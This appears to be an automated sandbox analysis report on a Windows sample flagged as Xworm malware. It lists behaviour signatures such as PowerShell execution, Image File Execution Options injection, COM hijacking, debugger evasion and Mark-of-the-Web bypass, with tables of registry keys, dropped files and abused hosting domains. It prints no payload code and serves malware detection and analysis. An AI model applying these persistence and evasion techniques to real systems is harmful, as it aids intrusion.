Analysis Overview
Threat Level: Known bad
The file https://file.io/h5Uhqk3g8uxH was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Event Triggered Execution: Image File Execution Options Injection
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Event Triggered Execution: Component Object Model Hijacking
Legitimate hosting services abused for malware hosting/C2
Mark of the Web detected: This indicates that the page was originally saved or cloned.
Checks installed software on the system
Checks whether UAC is enabled
Checks system information in the registry
Suspicious use of NtCreateThreadExHideFromDebugger
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-08-25 22:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-08-25 22:15
Reported: 2024-08-25 22:21
Platform: win11-20240802-en
Max time kernel: 359s
Max time network: 360s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Mark of the Web detected: This indicates that the page was originally saved or cloned.
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\button_zoom_default_right.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\DeveloperFramework\StudioTheme\clear_hover.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Menu\hamburger3D.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\PurchasePrompt\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicLight\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TerrainTools\mtrl_slate.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Settings\MenuBarAssets\MenuBackground.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\msedgeupdateres_kok.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\az.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AssetImport\Import.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\TopBar\chatOff.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\LuaPackages\Packages\_Index\FoundationImages\FoundationImages\SpriteSheets\img_set_1x_1.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Gamepad\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaApp\graphic\ph-avatar-portrait.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaChat\graphic\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\models\ViewSelector\Basic.mesh | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioSharedUI\KebabMenu.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\PlayStationController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\New\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\models\Thumbnails\Mannequins\Rthro.rbxm | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Lobby\Buttons\scroll_up.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\msedgeupdateres_tt.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\CompositorDebugger\clip.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TerrainTools\mt_add.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\collapsibleArrowDown.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\DeveloperFramework\close.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioToolbox\AudioMusic.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioUIEditor\icon_rotate1.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\RoactStudioWidgets\toggle_disable_dark.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioSharedUI\default_group.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\TagEditor\Insert.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\XboxController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicDark\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\MicLight\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\translations\CoreScriptLocalization.csv | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\MaterialGenerator\Materials\Wood.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Settings\ShareGame\icons.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Edge.dat | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Trust Protection Lists\Sigma\Staging | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\img_dark_timetag_bg.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\StudioToolbox\AssetConfig\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\SearchIcon.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Menu\buttonBackground.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\SpeakerNew\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Trust Protection Lists\manifest.json | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\LuaApp\icons\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\mojo_core.dll | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\hr.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\AnimationEditor\btn_clearText.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\MaterialGenerator\material_uploaded.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\particles\forcefield_glow_main.dds | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ViewSelector\left.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\CompositorDebugger\select.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Controls\DefaultController\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\VoiceChat\[email protected] | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ViewSelector\bottom.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\content\textures\ui\Lobby\Buttons\more_nine_slice_button.png | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\EdgeCore\128.0.2739.42\Locales\bg.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\128.0.2739.42\Locales\mr.pak | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\psmachine.dll | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
Drops file in Windows directory
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Debug\gay ass executor.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0" | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio | C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
